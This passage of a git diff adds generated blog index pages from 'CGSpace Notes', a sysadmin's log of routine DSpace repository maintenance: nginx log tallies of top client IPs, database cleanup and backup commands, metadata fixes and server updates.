+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-08/">August, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-08-03">2019-08-03</h2>
+<ul>
+<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li>
+</ul>
+<h2 id="2019-08-04">2019-08-04</h2>
+<ul>
+<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li>
+<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/4/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/6/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html
new file mode 100644
index 000000000..eb88b6c93
--- /dev/null
+++ b/docs/posts/page/6/index.html
@@ -0,0 +1,488 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-07/">July, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-07-01">2019-07-01</h2>
+<ul>
+<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li>
+<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li>
+</ul>
+</li>
+<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-06/">June, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-06-02">2019-06-02</h2>
+<ul>
+<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2019-06-03">2019-06-03</h2>
+<ul>
+<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-05/">May, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-05-01">2019-05-01</h2>
+<ul>
+<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li>
+<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+<ul>
+<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li>
+<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li>
+</ul>
+</li>
+<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+</code></pre><ul>
+<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-04/">April, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-04-01">2019-04-01</h2>
+<ul>
+<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+<ul>
+<li>They asked if we had plans to enable RDF support in CGSpace</li>
+</ul>
+</li>
+<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+<ul>
+<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+</code></pre><ul>
+<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
+<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-03/">March, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-03-01">2019-03-01</h2>
+<ul>
+<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li>
+<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li>
+<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+<ul>
+<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li>
+<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li>
+<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li>
+<li>68.15% � 9.45 instead of 68.15% ± 9.45</li>
+<li>2003�2013 instead of 2003–2013</li>
+</ul>
+</li>
+<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-02/">February, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-02-01">2019-02-01</h2>
+<ul>
+<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
+<li>The top IPs before, during, and after this latest alert tonight were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+</code></pre><ul>
+<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li>
+<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
+<li>There were just over 3 million accesses in the nginx logs last month:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-01/">January, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-01-02">2019-01-02</h2>
+<ul>
+<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
+<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-12/">December, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-12-01">2018-12-01</h2>
+<ul>
+<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li>
+<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li>
+<li>Then I ran all system updates and restarted the server</li>
+</ul>
+<h2 id="2018-12-02">2018-12-02</h2>
+<ul>
+<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-11/">November, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-11-01">2018-11-01</h2>
+<ul>
+<li>Finalize AReS Phase I and Phase II ToRs</li>
+<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li>
+</ul>
+<h2 id="2018-11-03">2018-11-03</h2>
+<ul>
+<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
+<li>Today these are the top 10 IPs:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-10/">October, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-10-01">2018-10-01</h2>
+<ul>
+<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li>
+<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/5/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/7/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html
new file mode 100644
index 000000000..5444a07e1
--- /dev/null
+++ b/docs/posts/page/7/index.html
@@ -0,0 +1,497 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-09/">September, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-09-02">2018-09-02</h2>
+<ul>
+<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li>
+<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li>
+<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
+<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-08/">August, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-08-01">2018-08-01</h2>
+<ul>
+<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li>
+<li>From the DSpace log I see that eventually Solr stopped responding, so I guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li>
+<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li>
+<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li>
+<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-07/">July, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-07-01">2018-07-01</h2>
+<ul>
+<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+</code></pre><ul>
+<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
+</ul>
+<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-06/">June, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
